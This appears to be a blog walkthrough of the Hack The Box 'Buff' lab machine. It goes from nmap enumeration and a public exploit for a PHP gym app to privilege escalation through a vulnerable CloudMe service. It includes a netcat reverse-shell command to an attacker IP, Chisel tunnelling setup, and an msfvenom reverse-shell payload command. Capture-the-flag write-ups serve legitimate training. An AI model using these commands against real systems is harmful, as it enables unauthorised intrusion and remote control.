Home Hackthebox Buff walkthrough
Post
Cancel

Hackthebox Buff walkthrough

buff

Enumeration

ِLet`s begain scanning with NMAP

Enumeration

ِTwo ports are open 8080 , 7680

HTTP-Page

ِAfter opening the webapp at 8080 i found out it`s from ProjectWorld.in

And i searched for the project

https://projectworlds.in/free-projects/php-projects/gym-management-system-project-in-php/

I searched for public exploit for the project and i found this Exploit

Exploiting

Python script

Authenticated

ِWe got in !

ِLet`s upload nc.exe

Uploading

Let`s get our reverse shell

ِC:\xampp\htdocs\gym\upload> powershell -c ".\nc.exe 10.10.10.10 1234 -e powershell"

Shaun

ِWe got shell as SHAUN ! , Let`s get the user hash.

USER Flag !

USER

Privilege Escalation

I uploaded WinPEAS.exe and after i ran it i found a vulnerable app called Cloudme.exe,it`s running on 8888 port

I search for an exploit and found these

image-3

ِWe need to use portforwarding to run the exploit, you can use CHISEL or PLINK.

It should be compiled to exe to run on windows i used golang

env GOOS=windows GOARCH=amd64 go build -o chisel-x64.exe -ldflags "-s -w"

You can compile it by this command

After compilt it to exe , let`s upload it

uploading-chisel

ِI started the server at 8080 on my machine

on-your-linux-server

ِWe need to start Chisel on the victim machine to connect

Chisel-on-victim

Exploiting Cloudme

We need to adjust msfvenom cmd to get a shell to our machine

So you to copy this and adjust your Ip address to get your shell "msfvenom -p windows/shell_reverse_tcp LHOST=0.0.0.0 LPORT=4444 EXITFUNC=thread -b "\x00\x0d\x0a" -f python" Exploit

Run your listner on the port you choosed in the payload then run the EXPLOIT ..

Listner Got-in

ROOT Flag !

admin-hash

Thanks for Reading 🙏

This post is licensed under CC BY 4.0 by the author.